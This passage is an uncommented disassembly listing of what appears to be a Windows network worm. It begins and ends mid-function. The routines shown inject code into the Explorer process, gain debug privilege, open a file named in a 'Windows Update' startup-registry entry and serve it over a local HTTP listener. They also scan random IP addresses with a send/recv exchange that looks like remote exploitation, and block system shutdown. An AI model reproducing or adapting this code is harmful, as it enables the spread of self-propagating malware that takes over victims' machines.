push offset dword_3160460C
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31601D26
push 0
push 0DEh
push offset dword_316046B8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31601D26
cmp eax, 46h
jl loc_31601D26
cmp [ebp+var_730], 31h
jnz loc_31601BD1
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31602C96 ; memset
add esp, 0Ch
push offset byte_316042B8
call dword_31601084 ; lstrlen
push eax
lea eax, [ebp+var_EA4]
push offset byte_316042B8
push eax
call sub_31602CA2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_31601084 ; lstrlen
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31602CA2 ; memcpy
mov eax, dword_31604BBE
add esp, 0Ch
mov [ebp+var_798], eax
loc_31601A72: ; CODE XREF: sub_316017DB+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31601D26
push 0
push 68h
push offset dword_316047FC
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31601D26
push 0
push 0A0h
push offset dword_31604868
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31601D26
cmp [ebp+arg_0], 0
jz loc_31601CC1
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31604A20
push eax
call sub_31602CA2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31602CA2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31604A8C
push eax
call sub_31602CA2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31602CA2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31604B00
push eax
call sub_31602CA2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31601D26
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31601D19
; ---------------------------------------------------------------------------
loc_31601BD1: ; CODE XREF: sub_316017DB+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31602C96 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31604BF8
push eax
call sub_31602CA2 ; memcpy
push offset byte_316042B8
call sub_31602C9C ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_316042B8
push eax
call sub_31602CA2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31604C70
push eax
call sub_31602CA2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31604BF8
push eax
call sub_31602CA2 ; memcpy
add esp, 40h
push offset byte_316042B8
call sub_31602C9C ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_316042B8
push eax
call sub_31602CA2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31601C6D: ; CODE XREF: sub_316017DB+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31601C6D
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31602C96 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31602C96 ; memset
add esp, 18h
jmp loc_31601A72
; ---------------------------------------------------------------------------
loc_31601CC1: ; CODE XREF: sub_316017DB+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_3160490C
push eax
call sub_31602CA2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31602CA2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_3160498C
push eax
call sub_31602CA2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31601D19: ; CODE XREF: sub_316017DB+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_31601D26: ; CODE XREF: sub_316017DB+1AD�j
; sub_316017DB+1E1�j ...
push 2
push [ebp+var_4]
call dword_31601170 ; shutdown
loc_31601D31: ; CODE XREF: sub_316017DB+166�j
push [ebp+var_4]
call dword_31601174 ; closesocket
pop esi
loc_31601D3B: ; CODE XREF: sub_316017DB+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_316017DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601D42 proc near ; CODE XREF: UPX0:loc_31602350�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_316010A8 ; LoadLibraryA
mov esi, dword_316010A4
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_31601DC6
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_31601DC6
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_31601DC6
lea eax, [ebp+var_C]
push eax
push 20h
call dword_316010A0 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31601DC6: ; CODE XREF: sub_31601D42+28�j
; sub_31601D42+37�j ...
pop edi
pop esi
leave
retn
sub_31601D42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601DCA proc near ; CODE XREF: UPX0:31602364�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31604FE0
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_316010B4 ; GetModuleHandleA
mov esi, dword_316010A4
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31601E11
loc_31601E0D: ; CODE XREF: sub_31601DCA+54�j
push 1
jmp short loc_31601E62
; ---------------------------------------------------------------------------
loc_31601E11: ; CODE XREF: sub_31601DCA+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31601E0D
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31601110 ; FindWindowA
test eax, eax
jnz short loc_31601E3F
call dword_31601114 ; GetForegroundWindow
test eax, eax
jnz short loc_31601E3F
push 2
jmp short loc_31601E62
; ---------------------------------------------------------------------------
loc_31601E3F: ; CODE XREF: sub_31601DCA+65�j
; sub_31601DCA+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31601118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_316010B0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31601E65
push 3
loc_31601E62: ; CODE XREF: sub_31601DCA+45�j
; sub_31601DCA+73�j
pop eax
jmp short loc_31601ED0
; ---------------------------------------------------------------------------
loc_31601E65: ; CODE XREF: sub_31601DCA+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3160107C
test eax, eax
jz short loc_31601EC3
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_316010AC ; WriteProcessMemory
push dword_31604FD4
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31601EAF
push eax
call esi ; CloseHandle
jmp short loc_31601ECA
; ---------------------------------------------------------------------------
loc_31601EAF: ; CODE XREF: sub_31601DCA+DE�j
push offset aUterm18 ; "uterm18"
call sub_31601F03
pop ecx
mov [ebp+var_4], 5
jmp short loc_31601ECA
; ---------------------------------------------------------------------------
loc_31601EC3: ; CODE XREF: sub_31601DCA+B2�j
mov [ebp+var_4], 4
loc_31601ECA: ; CODE XREF: sub_31601DCA+E3�j
; sub_31601DCA+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_31601ED0: ; CODE XREF: sub_31601DCA+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31601DCA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601ED5 proc near ; CODE XREF: sub_3160219E+B�p
; UPX0:31602326�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_316010B8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_316010EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31601ED5 endp
; =============== S U B R O U T I N E =======================================
sub_31601F03 proc near ; CODE XREF: sub_31601DCA+EA�p
; UPX0:31602330�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_316010BC ; CreateMutexA
retn
sub_31601F03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601F12 proc near ; CODE XREF: sub_3160238C+147�p
; sub_3160238C+152�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_316010C0 ; CreateThread
pop ebp
retn
sub_31601F12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601F2C proc near ; CODE XREF: sub_3160219E+12C�p
; sub_3160258F+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_316010C0 ; CreateThread
push eax
call dword_3160107C ; CloseHandle
pop ebp
retn
sub_31601F2C endp
; =============== S U B R O U T I N E =======================================
sub_31601F4D proc near ; CODE XREF: sub_316011A0+68�p
; sub_31602A60+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31601F75
loc_31601F5E: ; CODE XREF: sub_31601F4D+26�j
call dword_316010FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31601F5E
loc_31601F75: ; CODE XREF: sub_31601F4D+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31601F4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601F7D proc near ; CODE XREF: sub_316011A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31602C96 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_316010C4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3160107C
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31601F7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31601FD3 proc near ; CODE XREF: sub_31602617+3E�p
; sub_316026DE+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3160114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31601FF4
call dword_31601150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31601FF4: ; CODE XREF: sub_31601FD3+15�j
lea eax, [ebp+var_34]
push eax
call dword_31601154 ; gethostbyname
test eax, eax
jnz short loc_31602009
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31602009: ; CODE XREF: sub_31601FD3+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31601FD3 endp
; =============== S U B R O U T I N E =======================================
sub_31602012 proc near ; CODE XREF: sub_3160169C+C�p
; sub_3160252B+22�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31601130 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31602012 endp
; =============== S U B R O U T I N E =======================================
sub_31602028 proc near ; CODE XREF: sub_3160238C+D8�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_316010CC ; OpenEventA
test eax, eax
jz short locret_31602041
push eax
call dword_316010C8 ; SetEvent
locret_31602041: ; CODE XREF: sub_31602028+10�j
retn
sub_31602028 endp
; =============== S U B R O U T I N E =======================================
sub_31602042 proc near ; CODE XREF: sub_3160169C+39�p
push esi
mov esi, dword_316010FC
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_31602042 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31602058 proc near ; DATA XREF: sub_3160219E+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3160116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_31602089
push 1
jmp loc_31602144
; ---------------------------------------------------------------------------
loc_31602089: ; CODE XREF: sub_31602058+28�j
mov esi, dword_31601104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31602154
lea eax, [ebp+var_100]
push offset dword_316041F0
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31602154
mov esi, dword_31601168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_31604FD0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3160111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31602C9C ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_31602106: ; CODE XREF: sub_31602058+E8�j
mov eax, dword_31604FD0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_31602118
mov eax, ecx
loc_31602118: ; CODE XREF: sub_31602058+BC�j
test eax, eax
jz short loc_31602147
push 0
push eax
mov eax, dword_31604FC8
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31602142
cmp eax, 1000h
jb short loc_31602147
push 64h
add edi, eax
call dword_31601094 ; Sleep
jmp short loc_31602106
; ---------------------------------------------------------------------------
loc_31602142: ; CODE XREF: sub_31602058+D5�j
push 2
loc_31602144: ; CODE XREF: sub_31602058+2C�j
pop eax
jmp short loc_31602197
; ---------------------------------------------------------------------------
loc_31602147: ; CODE XREF: sub_31602058+C2�j
; sub_31602058+DC�j
push offset dword_31604FCC
call dword_316010D4 ; InterlockedIncrement
jmp short loc_31602172
; ---------------------------------------------------------------------------
loc_31602154: ; CODE XREF: sub_31602058+49�j
; sub_31602058+61�j
mov esi, dword_31601168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31604D38
push ebx
call esi ; send
loc_31602172: ; CODE XREF: sub_31602058+FA�j
push 7D0h
call dword_31601094 ; Sleep
push 2
push ebx
call dword_31601170 ; shutdown
push ebx
call dword_31601174 ; closesocket
push 0
call dword_316010D0 ; ExitThread
xor eax, eax
loc_31602197: ; CODE XREF: sub_31602058+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31602058 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3160219E proc near ; DATA XREF: sub_3160238C+142�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31601ED5
lea eax, [ebp+var_130]
push 104h
push eax
push offset aWindowsUpdate ; "Windows Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31604FCC, ebx
call sub_3160284E
add esp, 14h
test eax, eax
jnz loc_316022D3
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_31601080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_3160220A
push 1
call dword_316010D0 ; ExitThread
loc_3160220A: ; CODE XREF: sub_3160219E+62�j
push ebx
push esi
call dword_316010DC ; GetFileSize
push eax
mov dword_31604FD0, eax
call sub_31602C6A
pop ecx
mov dword_31604FC8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31604FD0
push eax
push esi
call dword_316010D8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31604FD0, eax
call dword_3160107C ; CloseHandle
push ebx
push 1
push 2
call dword_31601158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31602C96 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_3160226C: ; CODE XREF: sub_3160219E+E5�j
; sub_3160219E+ED�j ...
call dword_316010FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31604FDC, eax
jz short loc_3160226C
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_3160226C
push eax
call dword_31601160 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31601140 ; bind
test eax, eax
jnz short loc_3160226C
push 64h
push edi
call dword_31601144 ; listen
mov [ebp+var_8], esi
pop esi
loc_316022B5: ; CODE XREF: sub_3160219E+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31601148 ; accept
push eax
push offset sub_31602058
call sub_31601F2C
pop ecx
pop ecx
jmp short loc_316022B5
; ---------------------------------------------------------------------------
loc_316022D3: ; CODE XREF: sub_3160219E+3D�j
push ebx
call dword_316010D0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_3160219E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316022E2 proc near ; CODE XREF: sub_3160238C:loc_316024C8�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3160113C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_316022E2 endp
; ---------------------------------------------------------------------------
push 0
call dword_316010B4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31604FE0, eax
call dword_31601074 ; DeleteFileA
call sub_31601ED5
push offset aUterm18 ; "uterm18"
call sub_31601F03
pop ecx
mov dword_31604FD4, eax
call dword_316010E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31602350
push 1
call dword_316010E0 ; ExitProcess
loc_31602350: ; CODE XREF: UPX0:31602346�j
call sub_31601D42
call sub_316029B2
call sub_31602B2C
push offset sub_3160238C
call sub_31601DCA
test eax, eax
pop ecx
jz short loc_31602375
push 0
call sub_3160238C
loc_31602375: ; CODE XREF: UPX0:3160236C�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31602378 proc near ; CODE XREF: sub_3160238C:loc_316024F1�p
; sub_3160252B:loc_31602544�p ...
push 0
push dword_31604FD8
call dword_31601070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31602378 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3160238C proc near ; CODE XREF: UPX0:31602370�p
; DATA XREF: UPX0:3160235F�o
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31601190
push offset sub_31602C90
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov [ebp+var_68], offset aU10x ; "u10x"
mov [ebp+var_64], offset aU11x ; "u11x"
mov [ebp+var_60], offset aU12x ; "u12x"
mov [ebp+var_5C], offset aU13x ; "u13x"
mov [ebp+var_58], offset aU14x ; "u14x"
mov [ebp+var_54], offset aU15x ; "u15x"
mov [ebp+var_50], offset aU16x ; "u16x"
mov [ebp+var_4C], offset aU17x ; "u17x"
mov [ebp+var_48], offset aU8 ; "u8"
mov [ebp+var_44], offset aU9 ; "u9"
mov [ebp+var_40], offset aU10 ; "u10"
mov [ebp+var_3C], offset aU11 ; "u11"
mov [ebp+var_38], offset aU12 ; "u12"
mov [ebp+var_34], offset aU13 ; "u13"
mov [ebp+var_30], offset aU13i ; "u13i"
mov [ebp+var_2C], offset aU14 ; "u14"
mov [ebp+var_28], offset aU15 ; "u15"
mov [ebp+var_24], offset aU16 ; "u16"
mov [ebp+var_20], offset aU17 ; "u17"
mov [ebp+var_1C], offset aU18 ; "u18"
push offset aU18x ; "u18x"
xor edi, edi
push edi
push 1
push edi
call dword_3160106C ; CreateEventA
mov dword_31604FD8, eax
mov [ebp+var_4], edi
mov [ebp+var_6C], edi
loc_31602457: ; CODE XREF: sub_3160238C+E1�j
cmp [ebp+var_6C], 8
jnb short loc_3160246F
mov eax, [ebp+var_6C]
push [ebp+eax*4+var_68]
call sub_31602028
pop ecx
inc [ebp+var_6C]
jmp short loc_31602457
; ---------------------------------------------------------------------------
loc_3160246F: ; CODE XREF: sub_3160238C+CF�j
mov [ebp+var_6C], edi
loc_31602472: ; CODE XREF: sub_3160238C+FC�j
cmp [ebp+var_6C], 0Ch
jnb short loc_3160248A
mov eax, [ebp+var_6C]
push [ebp+eax*4+var_48]
call sub_31601F03
pop ecx
inc [ebp+var_6C]
jmp short loc_31602472
; ---------------------------------------------------------------------------
loc_3160248A: ; CODE XREF: sub_3160238C+EA�j
cmp [ebp+arg_0], edi
jz short loc_316024C8
push offset aWs2_32 ; "ws2_32"
mov esi, dword_316010A8
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm18 ; "uterm18"
call sub_31601F03
pop ecx
mov dword_31604FD4, eax
loc_316024C8: ; CODE XREF: sub_3160238C+101�j
call sub_316022E2
push edi
push offset sub_3160219E
call sub_31601F12
push edi
push offset sub_3160169C
call sub_31601F12
push edi
push offset loc_3160273A
call sub_31601F12
add esp, 18h
loc_316024F1: ; CODE XREF: sub_3160238C+180�j
call sub_31602378
test eax, eax
jnz short loc_3160250E
push edi
call dword_31601018 ; AbortSystemShutdownA
push 1388h
call dword_31601094 ; Sleep
jmp short loc_316024F1
; ---------------------------------------------------------------------------
loc_3160250E: ; CODE XREF: sub_3160238C+16C�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_3160238C endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3160252B proc near ; DATA XREF: sub_3160258F+55�o
; sub_31602617+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_3160253A
push 1
pop eax
jmp short locret_3160258B
; ---------------------------------------------------------------------------
loc_3160253A: ; CODE XREF: sub_3160252B+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_31602544: ; CODE XREF: sub_3160252B+5A�j
call sub_31602378
test eax, eax
jnz short loc_31602587
call sub_31602012
test eax, eax
jz short loc_31602587
cmp [ebp+var_1], bl
jz short loc_31602580
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_316017DB
movzx esi, word_31604FEC
pop ecx
call dword_316010FC ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_31601094 ; Sleep
loc_31602580: ; CODE XREF: sub_3160252B+2E�j
inc bl
cmp bl, 0FFh
jb short loc_31602544
loc_31602587: ; CODE XREF: sub_3160252B+20�j
; sub_3160252B+29�j
pop esi
xor eax, eax
pop ebx
locret_3160258B: ; CODE XREF: sub_3160252B+D�j
leave
retn 4
sub_3160252B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3160258F proc near ; DATA XREF: sub_31602617+7E�o
; UPX0:316027CF�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_3160259D
push 1
pop eax
jmp short loc_31602613
; ---------------------------------------------------------------------------
loc_3160259D: ; CODE XREF: sub_3160258F+7�j
push ebx
push esi
push edi
call sub_31601ED5
mov esi, dword_316010FC
xor ebx, ebx
loc_316025AD: ; CODE XREF: sub_3160258F+7D�j
call sub_31602378
test eax, eax
jnz short loc_3160260E
call sub_31602012
test eax, eax
jz short loc_3160260E
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31604FE4
mov byte ptr [ebp+arg_0+3], al
call dword_316010D4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_316017DB
test eax, eax
pop ecx
jnz short loc_316025F0
push [ebp+arg_0]
push offset sub_3160252B
call sub_31601F2C
pop ecx
pop ecx
loc_316025F0: ; CODE XREF: sub_3160258F+50�j
movzx edi, word_31604FEC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_31601094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_316025AD
loc_3160260E: ; CODE XREF: sub_3160258F+25�j
; sub_3160258F+2E�j
pop edi
pop esi
xor eax, eax
